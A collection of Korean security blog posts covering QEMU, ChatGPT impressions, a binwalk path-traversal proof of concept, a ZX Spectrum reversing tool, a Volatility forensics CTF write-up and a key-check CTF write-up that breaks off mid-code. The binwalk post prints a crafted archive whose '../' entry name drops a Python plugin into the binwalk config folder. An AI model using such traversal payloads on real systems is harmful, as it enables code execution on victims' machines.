반응형

QEMU란?

QEMU는 가상화 소프트웨어이며, 사용자가 다양한 아키텍처에서 가상머신을 실행할 수 있도록 지원합니다. 이 소프트웨어는 무료이며, 다양한 운영체제에서 동작합니다. QEMU는 또한 하드웨어 가속 기술을 지원하며, 특히 KVM(Kernel Virtual Machine)과 결합하여 가상화를 향상시킬 수 있습니다.

QEMU의 기능

QEMU는 다음과 같은 기능을 제공합니다.

  • 가상머신 생성 및 실행
  • 다양한 아키텍처에서의 가상머신 지원
  • 하드웨어 가속 기술 지원
  • 다양한 운영체제에서 동작
  • GUI 및 CLI 인터페이스 제공

QEMU의 사용

QEMU는 가상머신을 생성하고 실행하는 데 사용됩니다. QEMU를 사용하여 가상머신을 생성하고 실행하려면, 다음과 같은 단계를 따르면 됩니다.

  1. QEMU를 설치합니다.
  2. QEMU를 사용하여 가상머신을 생성합니다.
  3. 생성한 가상머신에서 운영체제를 설치합니다.
  4. 생성한 가상머신을 실행합니다.

QEMU는 CLI(Command-Line Interface)를 통해 사용할 수 있으며, 다음과 같은 명령어를 사용하여 가상머신을 생성하고 실행할 수 있습니다.

qemu-system-{arch} [options] [disk_image]

여기서 {arch}는 생성하려는 가상머신의 아키텍처를 나타냅니다. 예를 들어, x86 아키텍처의 가상머신을 생성하려면 qemu-system-x86_64 명령어를 사용합니다.

QEMU의 장단점

장점

  • 다양한 아키텍처에서의 가상머신 지원
  • 하드웨어 가속 기술 지원
  • 다양한 운영체제에서 동작

단점

  • 성능이 상대적으로 느림
  • GUI 인터페이스가 다소 불편함

결론

QEMU는 무료이며, 다양한 아키텍처에서 가상머신을 실행할 수 있는 가상화 소프트웨어입니다. 하드웨어 가속 기술을 지원하여 가상화를 향상시킬 수 있으며, 다양한 운영체제에서 동작합니다. 그러나 성능이 상대적으로 느리고 GUI 인터페이스가 다소 불편하다는 단점이 있습니다.

반응형
반응형
chatGPT 사용 예시

 

2022년 보안 이슈 질의

사용해 본 결과

- 동향 및 간략한 정리용 보고서를 사용하는데 아주 좋다.

- 아직은 심도 있는 코드쪽은 사용해보지 못했지만, 여러 정황으로 볼때 퀄리티는 나쁘지 않을 것으로 예상된다.

- 취약점 점검도 가능한지는 도전해보고 싶다는 의욕이 생겼다.

- 다음에는 동영상 편집쪽으로 테스트 해볼 계획이다.

- 앞으로 먹고 살기 힘들구만...ㅜㅜ

반응형

'Reverse > 분석중' 카테고리의 다른 글

[Ref] Spectrum Analyser  (0) 2023.01.13
반응형

설명

버전 2.1.2b ~ 2.3.2 까지의 ReFirm Labs binwalk에서 경로 탐색 취약점이 확인 되었다.

이 취약점을 통해 원격 공격자는 영향을 받는 binwalk 설치에서 임의 코드를 실행 할 수 있다.

“-e : 대상이 추출 모드(옵션)를 사용하여, binwalk로 악성 파일을 열어야 한다.”는 점에서 이 취약점을 악용하려면 사용자 상호 작용이 필요합니다 .

테스트 환경

  • MacOS Ventura 3.1
  • Homebrew로 설치한 Binwalk v2.3.3

테스트 과정

  1. binwalk -e -M poc.zip
babyhack@MacBookPro> binwalk -e -M poc.zip

Scan Time:     2023-02-01 20:30:54
Target File:   /Users/babyhack/Downloads/poc.zip
MD5 Checksum:  4fdad30c7c1b4915938b5ad2786f5bf8
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Zip archive data, at least v2.0 to extract, compressed size: 170, uncompressed size: 349, name: malicious.pfs
324           0x144           End of Zip archive, footer length: 22

Scan Time:     2023-02-01 20:30:54
Target File:   /Users/babyhack/Downloads/_poc.zip.extracted/malicious.pfs
MD5 Checksum:  9a12bccad3db3ed8b818a31846d5976f
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PFS filesystem, version 0.9, 1 files

malicious.pfs 파일 내용

babyhack@MacBookPro> xxd malicious.pfs
00000000: 5046 532f 302e 3900 0000 0000 0000 0100  PFS/0.9.........
00000010: 2e2e 2f2e 2e2f 2e2e 2f2e 636f 6e66 6967  ../../../.config
00000020: 2f62 696e 7761 6c6b 2f70 6c75 6769 6e73  /binwalk/plugins
00000030: 2f6d 616c 7761 6c6b 2e70 7900 0000 0000  /malwalk.py.....
00000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000090: 3412 0000 a000 0000 c100 0000 696d 706f  4...........impo
000000a0: 7274 2062 696e 7761 6c6b 2e63 6f72 652e  rt binwalk.core.
000000b0: 706c 7567 696e 0a0a 636c 6173 7320 4d61  plugin..class Ma
000000c0: 6c69 6369 6f75 7345 7874 7261 6374 6f72  liciousExtractor
000000d0: 2862 696e 7761 6c6b 2e63 6f72 652e 706c  (binwalk.core.pl
000000e0: 7567 696e 2e50 6c75 6769 6e29 3a0a 2020  ugin.Plugin):.
000000f0: 2020 2222 220a 2020 2020 4d61 6c69 6369    """.    Malici
00000100: 6f75 7320 6269 6e77 616c 6b20 706c 7567  ous binwalk plug
00000110: 696e 0a20 2020 2022 2222 0a0a 2020 2020  in.    """..
00000120: 6465 6620 696e 6974 2873 656c 6629 3a0a  def init(self):.
00000130: 2020 2020 2020 2020 7072 696e 7428 2268          print("h
00000140: 656c 6c6f 2066 726f 6d20 6d61 6c69 6369  ello from malici
00000150: 6f75 7320 706c 7567 696e 2229 0a         ous plugin").
import binwalk.core.plugin

class MaliciousExtractor(binwalk.core.plugin.Plugin):
"""    Malicious binwalk plugin.    """
	def init(self):
		print("hello from malicious plugin")

결과

  • binwalk.core.plugin 파일을 참조할 수 없어 제대로 실행 되지 않음.
  • 버전이 맞지 않아서 제대로 실행되지 않을 가능성도 있음.

ref.

  • https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk
반응형
반응형

Spectrum Analyser

Spectrum Analyser is a tool that is designed to help reverse engineer ZX Spectrum games & programs.It is a combination of an emulator, debugger & interactive disassembler. Programs are loaded and run in the emulator and their state can be inspected using the tools provided.

These tools include:

• Disassembler

• Debugger

• Graphics viewer

• Frame trace

• Memory diff

• IO analyser

 

Other features include:

• Interactive annotation: labels, functions & comments

• Watch window

• Format memory as Byte, Word, Char Map, Bitmap etc.

• Breakpoints: break on code execution, memory access, NMI, IRQ, IN & OUT

• Fully annotated Sinclair ROM

• Self modifying code support

• Automatic code detection

• Automatic data detection

• Poke support

• Skoolkit import and export

• Character graphic memory search tool

• Z80 instruction informational tooltips

 

How does it work?

The traditional way to reverse engineer software is to manually determine which areas of the computer memory are code or data. A disassembler can then be used to produce an assembly listing of the code memory bytes. One way to achieve this is to observe the code running through a debugger.

This can be slow work – although some excellent tools exist to help with this process, such as IDA Pro or Ghidra. This process can be partially automated by using an execution trace file. This can help confirm which areas of memory are code if we know they have been executed.

 

Spectrum Analyser aims to automate as much of the manual process as possible. It has an emulator built in, which means it can automatically detect which memory locations are code when those locations are executed. The more you play the game, the more code it will uncover. However, Spectrum Analyser is very much interactive. You are free to manually mark up areas of memory as code if you prefer – without needing to execute the code in question. You do not need to tell Spectrum Analyser where the code ends – only where it begins. It will use static code analysis to work out where the code terminates.

 

Starting Off

When you open a game for the first time Spectrum Analyser will start from a blank slate. In this state, all memory locations will be formatted as byte data. This is the default state of memory that hasn’t been executed.

This is the same memory after the program has been executed. Spectrum Analyser has set the memory to code and added labels for functions in addition to branch destination labels.

These labels can then be renamed when you figure out what the code is actually doing. You can then add comments to the disassembly.

 

Screenshots

Here are some action shots of Spectrum Analyser. For best results you may need to download the images and view them full screen or open them in a seperate tab.

 

Acknowledgements

This program was built using the superb Chips emulator library by Andre Weissflog, the emulation in the analyser is done using this library: https://github.com/floooh/chips

 

GitHub - floooh/chips: 8-bit chip and system emulators in standalone C headers

8-bit chip and system emulators in standalone C headers - GitHub - floooh/chips: 8-bit chip and system emulators in standalone C headers

github.com

For the UI, DearImGui is used (https://github.com/ocornut/imgui) which is without doubt one of the greatest pieces of open source software. Without it not only would the UI take much longer but working on it would also be exceedingly dull.

 

Spectrum Analyser contains a full disassembly of the Sinclair ROM. This was possible because of the skoolkit disassembly done by Richard Dymond. https://skoolkit.ca/disassemblies/rom/

 

Spectrum ROM: Index

The Complete Spectrum ROM Disassembly 20221121 © 1982 Amstrad. © 1983 Dr Ian Logan & Dr Frank O'Hara. © 2022 Richard Dymond.

skoolkit.ca

Tutorial

Need help getting started using Spectrum Analyser, or just want to see how it works? Here is a tutorial. This doesn’t cover everything but it will get you started.

https://www.youtube.com/embed/-HFXnF4cHb0

 

YouTube

 

www.youtube.com

Documentation There is some (incomplete) documentation here.

Contact Feedback and bug reports are very welcome. Please send them to spectrumanalysertool@gmail.com

Download Click here to download the latest version (Windows 10 and above).

 

ref.

https://colourclash.co.uk/spectrum-analyser/?fbclid=IwAR3i9CsPO9fLrd47L8Iob1DoQ_HDTdPOX4JKRGub7gcAvUgQY1zYNIrAWjU 

 

Spectrum Analyser – Colourclash

Spectrum Analyser is a tool that is designed to help reverse engineer ZX Spectrum games & programs. It is a combination of an emulator, debugger & interactive disassembler. Programs are loaded and run in the emulator and their state can be inspected using

colourclash.co.uk

 

반응형

'Reverse > 분석중' 카테고리의 다른 글

[chatGPT] 성능 테스트 (최근 보안동향)  (0) 2023.02.21
반응형




컴퓨터_보안_창과방패.7z.001

컴퓨터_보안_창과방패.7z.002

컴퓨터_보안_창과방패.7z.003



오랜만에 글을 올리게 되었습니다.

최근 강의 자료 공유 요청하는 메일을 종종 받고 있습니다.

따라서, 제 홈페이지에 공유 하도록 하겠습니다.


이한미디어 출판사와는 현재 연락이 되지 않아 

이렇게라도 제가 쓴 책에 대한 보답을 해야 할 것 같아 자료를 공유 합니다.


부족한 부분이 있다면 언제든 연락 주세요.


crattack@gmail.com


강의 자료이기 때문에 개인에게 공유를 드리긴 어려울 것 같습니다.

강의 하시는 분의 학교 계정 메일로 성함과 과목을 함께 기입하셔서 저에게 메일을 주시면 

비밀번호를 공유 드리겠습니다.


책을 구매해주셔서 다시 한번 감사드립니다.

더 좋은 책으로 찾아 뵙도록 노력 하겠습니다.

( _ _ )

반응형

'Reverse > SystemDoc' 카테고리의 다른 글

[HowTo] Windows Testing Mode  (0) 2014.02.04
Windows Veriosn Check  (0) 2014.02.03
Key Log List  (0) 2012.08.07
Windows7 64bit Paros 설치  (1) 2012.01.31
Windows 7 Driver Test 방법  (0) 2012.01.18
반응형

문제를 요청한 Kenji Aiko님께 감사 드리며, 출제한 문제에 대한 풀이집을 올립니다.

(Forensic 100)


/////////////////////////////////////////////////////////////////////////////////////////////////////////

 

 

Forensic 100 - writeup

Date. 2016. 11. 07.

Written by crattack

 

 

 

Question.

 

컴퓨터를 사용하다가 컴퓨터가 느려지는 현상이 발견되어, 원인을 파악해 보니 특정 파일에서 지속적으로 인터넷을 연결하는 현상이 감지 되었다. 해당 사이트에 접근해보니 특정 문구가 존재하였다.

해당 사이트에 접근하여 특정 문구인 flag를 획득하시오.

 

コンピュ使用しながらパソコンがくなる現象発見され、原因把握してみると、特定ファイルで続的にインタネットを連結する現象感知された。 当該サイトへアクセスしてみると、特定のフレズが存在した。

当該サイトへアクセスして特定のフレズであるflag獲得しなさい。



Write up.

 

1. 이미지의 정보를 확인 / イメジの情報確認

( http://downloads.volatilityfoundation.org/releases/2.4/volatility_2.4.win.standalone.zip)

C:\Volatility>vol.py -f "C:\Forensic_100\forensic_100.raw" imageinfo

 

Volatility Foundation Volatility Framework 2.4

*** Failed to import volatility.plugins.linux.netscan (ImportError: No module named yara)

Determining profile based on KDBG search...

 

          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)

                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)

                     AS Layer2 : FileAddressSpace (C:\Forensic_100\forensic_100.raw)

                      PAE type : PAE

                           DTB : 0x34c000L

                          KDBG : 0x80545ce0L

          Number of Processors : 1

     Image Type (Service Pack) : 3

                KPCR for CPU 0 : 0xffdff000L

             KUSER_SHARED_DATA : 0xffdf0000L

           Image date and time : 2016-10-31 05:45:14 UTC+0000

     Image local date and time : 2016-10-31 14:45:14 +0900

 

2. DLL 리스트를 활용하여, 이상 프로세스 확인 / DLLリストを活用して、異常プロセス確認

 

C:\Volatility>vol.py -f "C:\Forensic_100\forensic_100.raw" dlllist > C:\Forensic_100\dlllist.txt

 

*** Failed to import volatility.plugins.linux.netscan (ImportError: No module named yara)

************************************************************************

System pid:      4

Unable to read PEB for task.

************************************************************************

smss.exe pid:    540

Unable to read PEB for task.

************************************************************************

csrss.exe pid:    604

Command line : C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16

Service Pack 3

 

Base             Size  LoadCount Path

---------- ---------- ---------- ----

0x4a680000     0x5000     0xffff \??\C:\WINDOWS\system32\csrss.exe

0x7c900000    0xb2000     0xffff C:\WINDOWS\system32\ntdll.dll

0x75b40000     0xb000     0xffff C:\WINDOWS\system32\CSRSRV.dll

0x75b50000    0x10000        0x3 C:\WINDOWS\system32\basesrv.dll

0x75b60000    0x4b000        0x2 C:\WINDOWS\system32\winsrv.dll

0x77f10000    0x49000        0xa C:\WINDOWS\system32\GDI32.dll

0x7c800000    0xf6000       0x1f C:\WINDOWS\system32\KERNEL32.dll

0x7e410000    0x91000        0xa C:\WINDOWS\system32\USER32.dll

0x629c0000     0x9000        0x1 C:\WINDOWS\system32\LPK.DLL

0x74d90000    0x6b000        0x1 C:\WINDOWS\system32\USP10.dll

0x77dd0000    0x9b000        0xd C:\WINDOWS\system32\ADVAPI32.dll

0x77e70000    0x93000        0x7 C:\WINDOWS\system32\RPCRT4.dll

0x77fe0000    0x11000        0x5 C:\WINDOWS\system32\Secur32.dll

0x7e720000    0xb0000        0x1 C:\WINDOWS\system32\sxs.dll

************************************************************************

………………………………………………

 

DumpIt.exe pid:   3784

Command line : "C:\Documents and Settings\Administrator\My Documents\Downloads\DumpIt.exe"

Service Pack 3

 

Base             Size  LoadCount Path

---------- ---------- ---------- ----

0x00400000    0x35000     0xffff C:\Documents and Settings\Administrator\My Documents\Downloads\DumpIt.exe

0x7c900000    0xb2000     0xffff C:\WINDOWS\system32\ntdll.dll

0x7c800000    0xf6000     0xffff C:\WINDOWS\system32\kernel32.dll

0x77dd0000    0x9b000     0xffff C:\WINDOWS\system32\ADVAPI32.dll

0x77e70000    0x93000     0xffff C:\WINDOWS\system32\RPCRT4.dll

0x77fe0000    0x11000     0xffff C:\WINDOWS\system32\Secur32.dll

0x77f60000    0x76000     0xffff C:\WINDOWS\system32\SHLWAPI.dll

0x77f10000    0x49000     0xffff C:\WINDOWS\system32\GDI32.dll

0x7e410000    0x91000     0xffff C:\WINDOWS\system32\USER32.dll

0x77c10000    0x58000     0xffff C:\WINDOWS\system32\msvcrt.dll

0x76390000    0x1d000        0x1 C:\WINDOWS\system32\IMM32.DLL

0x629c0000     0x9000        0x1 C:\WINDOWS\system32\LPK.DLL

0x74d90000    0x6b000        0x1 C:\WINDOWS\system32\USP10.dll

************************************************************************

svchost.exe pid:    1776

Command line : "C:\WINDOWS\svchost.exe"

Service Pack 3

 

Base             Size  LoadCount Path

---------- ---------- ---------- ----

0x00400000     0x9000     0xffff C:\WINDOWS\svchost.exe

0x7c900000    0xb2000     0xffff C:\WINDOWS\system32\ntdll.dll

0x7c800000    0xf6000     0xffff C:\WINDOWS\system32\kernel32.dll

0x10000000     0xa000     0xffff C:\WINDOWS\JDMBackgroundProcess.dll

0x77dd0000    0x9b000     0xffff C:\WINDOWS\system32\ADVAPI32.dll

0x77e70000    0x93000     0xffff C:\WINDOWS\system32\RPCRT4.dll

0x77fe0000    0x11000     0xffff C:\WINDOWS\system32\Secur32.dll

0x00350000    0x6d000     0xffff C:\WINDOWS\system32\MSVCP140.dll

0x003c0000    0x15000     0xffff C:\WINDOWS\system32\VCRUNTIME140.dll

0x003e0000     0x4000     0xffff C:\WINDOWS\system32\api-ms-win-crt-runtime-l1-1-0.dll

0x00410000    0xd8000     0xffff C:\WINDOWS\system32\ucrtbase.dll

0x003f0000     0x3000     0xffff C:\WINDOWS\system32\api-ms-win-core-string-l1-1-0.dll

0x004f0000     0x3000     0xffff C:\WINDOWS\system32\api-ms-win-core-errorhandling-l1-1-0.dll

…………………………..

************************************************************************

………………………….

IEXPLORE.EXE pid:   2304

Command line : "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2496 CREDAT:79880

Service Pack 3

……………………………………………………

 

 

3. 의심 프로세스 덤프 후 분석 / いプロセスダンプ分析

 

C:\Volatility>vol.py -f "c:\forensic_100\forensic_100.raw" procdump --pid=1776 -D c:\forensic_100\

 

Volatility Foundation Volatility Framework 2.4

*** Failed to import volatility.plugins.linux.netscan (ImportError: No module named yara)

Process(V) ImageBase  Name                 Result

---------- ---------- -------------------- ------

0x81f65da0 0x00400000 svchost.exe          OK: executable.1776.exe

 

 



000000001B68   000000403368      0   C:\Program Files\Internet Explorer\iexplore.exe http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd


 

4. 접속 정보 확인 / 続情報確認

 

도메인 확인 / ドメイン確認

 




C:\Volatility>vol.py -f "C:\Forensic_100\forensic_100.raw" connections > C:\Forensic_100\connections.txt


 

*** Failed to import volatility.plugins.linux.netscan (ImportError: No module named yara)

Offset(V)  Local Address             Remote Address            Pid

---------- ------------------------- ------------------------- ---

0x8213bbe8 192.168.88.131:1034       153.127.200.178:80           1080

 

Connection 정보와 일치하지 않으므로 도메인 관련 변조가 있을 것으로 추정 / Connection情報一致しないのでドメイン関連変造があると推定

 

5. Hosts 파일 덤프 하기 위해 주소 확인 / Hostsファイルダンプするため住所確認

 

C:\Volatility>vol.py -f "C:\Forensic_100\forensic_100.raw" filescan > c:\forensic_100\filescan.txt


 

*** Failed to import volatility.plugins.linux.netscan (ImportError: No module named yara)

Offset(V)  Local Address             Remote Address            Pid

---------- ------------------------- ------------------------- ---

0x8213bbe8 192.168.88.131:1034       153.127.200.178:80           1080

 

Connection 정보와 일치하지 않으므로 도메인 관련 변조가 있을 것으로 추정 / Connection情報一致しないのでドメイン関連変造があると推定


 

*** Failed to import volatility.plugins.linux.netscan (ImportError: No module named yara)

Offset(P)            #Ptr   #Hnd Access Name

------------------ ------ ------ ------ ----

0x0000000001734038      3      0 RWD--- \Device\HarddiskVolume1\$Directory

0x000000000174a270      3      0 RWD--- \Device\HarddiskVolume1\$Directory

0x0000000001756cf8      1      0 R--r-d \Device\HarddiskVolume1??????


?

0x00000000017634f0      1      0 -W---- \Device\HarddiskVolume1??????????????

0x0000000001763c60      1      0 R--r-d \Device\HarddiskVolume1?

0x0000000001794b18      3      0 RWD--- \Device\HarddiskVolume1\$Directory

.........................................

0x00000000020f0268      1      0 R--rw- \Device\HarddiskVolume1\WINDOWS\svchost.exe

0x00000000020f0a90      2      1 ------ \Device\NamedPipe\PCHHangRepExecPipe

0x00000000020f3888      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\adobeflashcs3.txt

0x00000000020f4f90      1      1 ------ \Device\NamedPipe\net\NtControlPipe8

0x00000000020f5028      2      1 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\mui\041e

0x00000000020f50d0      2      1 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\mui\0425

0x00000000020f5e38      3      0 RWD--- \Device\HarddiskVolume1\$Directory

0x00000000020f5f90      3      0 RWD--- \Device\HarddiskVolume1\$Directory

0x00000000020f6108      2      1 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\mui\040C

0x00000000020f8658      3      0 RWD--- \Device\HarddiskVolume1\$ConvertToNonresident

.............................

0x000000000217b748      1      0 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\drivers\etc\hosts

………………………

 

Hosts 파일의 메모리 주소를 활용하여 Dump / Hostsファイルのメモリアドレスを活用してDump

 

C:\Volatility>vol.py -f "c:\forensic_100\forensic_100.raw" dumpfiles -Q 0x217b748 --dump-dir=c:\forensic_100\

 

# Copyright (c) 1993-1999 Microsoft Corp.

#

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

#

# This file contains the mappings of IP addresses to host names. Each

# entry should be kept on an individual line. The IP address should

# be placed in the first column followed by the corresponding host name.

# The IP address and the host name should be separated by at least one

# space.

#

# Additionally, comments (such as these) may be inserted on individual

# lines or following the machine name denoted by a '#' symbol.

#

# For example:

#

#      102.54.94.97     rhino.acme.com          # source server

#       38.25.63.10     x.acme.com              # x client host

 

127.0.0.1       localhost

153.127.200.178    crattack.tistory.com

 

http://153.127.200.178/entry/Data-Science-import-pandas-as-pd



------------------------------------------------------

이상으로 write up을 마칩니다.

오랜만에 문제를 만드니까 즐거웠습니다. ( _ _ )

반응형
반응형

https://github.com/ctfs/write-ups-2016/tree/master/secuinside-ctf-quals-2016/cgc/cykor_00002-150

write up : https://ctf.rip/secuinside2016-cykor00002/


vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : aaaaaaaaaaaaaaa
Get out of here :(


우선 실행하고 실행 된 내용 문자열을 기반으로 ida 분석을 진행 하도록 합시다.


int main_sub_8048F50()
{
  char v1; // [esp+70h] [ebp-448h]@1
  char v2; // [esp+B0h] [ebp-408h]@3
  char v3; // [esp+B1h] [ebp-407h]@4
  int v4; // [esp+4B0h] [ebp-8h]@1

  v4 = 0;
  sub_8049FC0("----------------------------------------\n");
  sub_8049FC0("-          Simple Echo System          -\n");
  sub_8049FC0("----------------------------------------\n");
  sub_8049FC0("What is your name?\n");
  sub_8048E90(&v1);
  if ( sub_8048E10((int)&v1, (int)"ADMIN", 5u) )
  {
    sub_8049FC0("Hi %s\n");
    sub_8049FC0(": ");
    *(&v2 + sub_80480A0(&v2, 1000, 10)) = 0;
    sub_8049FC0("%s\n");
  }
  else
  {
    sub_8049FC0("+ Gimme a key : ");
    sub_80480A0(&01_byte_805F454, 27, 10);
    if ( compare_key_sub_8048150() )
    {
      sub_8049FC0("Welcome Admin :)\n");
      sub_8049FC0(": ");
      sub_80480A0(&v2, 1000, 10);
      if ( v2 == 'C' && v3 == 'K' )
        MEMORY[0] = 10;
      sub_8049FC0("%s\n");
    }
    else
    {
      sub_8049FC0("Get out of here :(\n");
    }
  }
  return 0;
}
 


compare_key_sub_8048150() 를 확인 하면 특정 값을 맞춰야지, 통과할 수 있게 되어 있습니다.


_BOOL4 compare_key_sub_8048150()
{
  signed int v1; // [esp+0h] [ebp-4h]@1

  v1 = 0;
  if ( 21_byte_805F468
     + 04_byte_805F457
     + 13_byte_805F460
     + 22_byte_805F469
     + 24_byte_805F46B
     + 08_byte_805F45B
     + 02_byte_805F455
     + 07_byte_805F45A
     + 10_byte_805F45D
     + 18_byte_805F465
     + 12_byte_805F45F
     + 19_byte_805F466
     + 06_byte_805F459 == 1068 )
    v1 = 1;
  if ( 11_byte_805F45E
     + 08_byte_805F45B
     + 10_byte_805F45D
     + 18_byte_805F465
     + 19_byte_805F466
     + 23_byte_805F46A
     + 03_byte_805F456
     + 02_byte_805F455
     + 14_byte_805F461
     + 16_byte_805F463 == 760 )
    ++v1;
  if ( 15_byte_805F462
     + 02_byte_805F455
     + 10_byte_805F45D
     + 17_byte_805F464
     + 01_byte_805F454
     + 14_byte_805F461
     + 16_byte_805F463
     + 12_byte_805F45F
     + 13_byte_805F460
     + 21_byte_805F468
     + 06_byte_805F459
     + 23_byte_805F46A
     + 22_byte_805F469 == 997 )
    ++v1;
  if ( 05_byte_805F458
     + 09_byte_805F45C
     + 20_byte_805F467
     + 22_byte_805F469
     + 02_byte_805F455
     + 07_byte_805F45A
     + 24_byte_805F46B
     + 14_byte_805F461
     + 17_byte_805F464
     + 13_byte_805F460 == 782 )
    ++v1;
  if ( 20_byte_805F467
     + 11_byte_805F45E
     + 19_byte_805F466
     + 17_byte_805F464
     + 14_byte_805F461
     + 03_byte_805F456
     + 08_byte_805F45B
     + 07_byte_805F45A
     + 21_byte_805F468
     + 15_byte_805F462 == 778 )
    ++v1;
  if ( 21_byte_805F468
     + 20_byte_805F467
     + 06_byte_805F459
     + 10_byte_805F45D
     + 05_byte_805F458
     + 15_byte_805F462
     + 23_byte_805F46A
     + 22_byte_805F469
     + 04_byte_805F457
     + 25_byte_805F46C
     + 13_byte_805F460
     + 24_byte_805F46B
     + 19_byte_805F466
     + 14_byte_805F461 == 1123 )
    ++v1;
  if ( 23_byte_805F46A
     + 09_byte_805F45C
     + 06_byte_805F459
     + 14_byte_805F461
     + 16_byte_805F463
     + 12_byte_805F45F
     + 08_byte_805F45B
     + 11_byte_805F45E
     + 02_byte_805F455
     + 19_byte_805F466
     + 01_byte_805F454
     + 15_byte_805F462
     + 20_byte_805F467
     + 03_byte_805F456
     + 24_byte_805F46B == 1180 )
    ++v1;
  if ( 06_byte_805F459
     + 25_byte_805F46C
     + 12_byte_805F45F
     + 24_byte_805F46B
     + 20_byte_805F467
     + 23_byte_805F46A
     + 01_byte_805F454
     + 05_byte_805F458
     + 04_byte_805F457
     + 09_byte_805F45C
     + 14_byte_805F461
     + 21_byte_805F468
     + 19_byte_805F466
     + 03_byte_805F456
     + 10_byte_805F45D
     + 18_byte_805F465
     + 08_byte_805F45B
     + 13_byte_805F460 == 1498 )
    ++v1;
  if ( 19_byte_805F466
     + 24_byte_805F46B
     + 15_byte_805F462
     + 05_byte_805F458
     + 25_byte_805F46C
     + 02_byte_805F455
     + 01_byte_805F454
     + 22_byte_805F469
     + 06_byte_805F459
     + 17_byte_805F464
     + 08_byte_805F45B
     + 13_byte_805F460
     + 16_byte_805F463
     + 21_byte_805F468
     + 04_byte_805F457 == 1213 )
    ++v1;
  if ( 18_byte_805F465
     + 22_byte_805F469
     + 10_byte_805F45D
     + 11_byte_805F45E
     + 07_byte_805F45A
     + 15_byte_805F462
     + 21_byte_805F468
     + 02_byte_805F455
     + 09_byte_805F45C
     + 25_byte_805F46C == 779 )
    ++v1;
  if ( 01_byte_805F454
     + 04_byte_805F457
     + 20_byte_805F467
     + 03_byte_805F456
     + 24_byte_805F46B
     + 23_byte_805F46A
     + 16_byte_805F463
     + 21_byte_805F468
     + 05_byte_805F458 == 742 )
    ++v1;
  if ( 16_byte_805F463
     + 24_byte_805F46B
     + 20_byte_805F467
     + 07_byte_805F45A
     + 18_byte_805F465
     + 11_byte_805F45E
     + 09_byte_805F45C
     + 05_byte_805F458
     + 06_byte_805F459
     + 12_byte_805F45F
     + 02_byte_805F455
     + 10_byte_805F45D
     + 15_byte_805F462
     + 04_byte_805F457
     + 21_byte_805F468 == 1196 )
    ++v1;
  if ( 07_byte_805F45A
     + 02_byte_805F455
     + 09_byte_805F45C
     + 14_byte_805F461
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 13_byte_805F460
     + 22_byte_805F469
     + 19_byte_805F466
     + 24_byte_805F46B
     + 15_byte_805F462
     + 16_byte_805F463
     + 23_byte_805F46A
     + 18_byte_805F465 == 1091 )
    ++v1;
  if ( 22_byte_805F469
     + 18_byte_805F465
     + 23_byte_805F46A
     + 01_byte_805F454
     + 05_byte_805F458
     + 02_byte_805F455
     + 19_byte_805F466
     + 20_byte_805F467
     + 13_byte_805F460 == 764 )
    ++v1;
  if ( 14_byte_805F461
     + 17_byte_805F464
     + 23_byte_805F46A
     + 02_byte_805F455
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 18_byte_805F465
     + 15_byte_805F462
     + 11_byte_805F45E
     + 05_byte_805F458
     + 09_byte_805F45C
     + 08_byte_805F45B
     + 01_byte_805F454
     + 19_byte_805F466
     + 07_byte_805F45A
     + 22_byte_805F469
     + 21_byte_805F468
     + 10_byte_805F45D == 1463 )
    ++v1;
  if ( 16_byte_805F463 + 09_byte_805F45C + 02_byte_805F455 + 12_byte_805F45F + 22_byte_805F469 + 20_byte_805F467 == 465 )
    ++v1;
  if ( 17_byte_805F464
     + 19_byte_805F466
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 05_byte_805F458
     + 20_byte_805F467
     + 13_byte_805F460
     + 02_byte_805F455
     + 07_byte_805F45A
     + 14_byte_805F461
     + 01_byte_805F454
     + 22_byte_805F469 == 955 )
    ++v1;
  if ( 07_byte_805F45A
     + 08_byte_805F45B
     + 22_byte_805F469
     + 19_byte_805F466
     + 01_byte_805F454
     + 10_byte_805F45D
     + 15_byte_805F462
     + 18_byte_805F465 == 654 )
    ++v1;
  if ( 02_byte_805F455
     + 03_byte_805F456
     + 17_byte_805F464
     + 13_byte_805F460
     + 24_byte_805F46B
     + 01_byte_805F454
     + 11_byte_805F45E
     + 07_byte_805F45A
     + 21_byte_805F468
     + 19_byte_805F466
     + 23_byte_805F46A
     + 08_byte_805F45B
     + 16_byte_805F463 == 1030 )
    ++v1;
  if ( 23_byte_805F46A + 24_byte_805F46B + 12_byte_805F45F == 275 )
    ++v1;
  if ( 22_byte_805F469
     + 04_byte_805F457
     + 02_byte_805F455
     + 21_byte_805F468
     + 01_byte_805F454
     + 09_byte_805F45C
     + 13_byte_805F460 == 563 )
    ++v1;
  if ( 15_byte_805F462 + 06_byte_805F459 + 12_byte_805F45F + 19_byte_805F466 + 18_byte_805F465 + 25_byte_805F46C == 509 )
    ++v1;
  if ( 20_byte_805F467
     + 11_byte_805F45E
     + 13_byte_805F460
     + 22_byte_805F469
     + 17_byte_805F464
     + 25_byte_805F46C
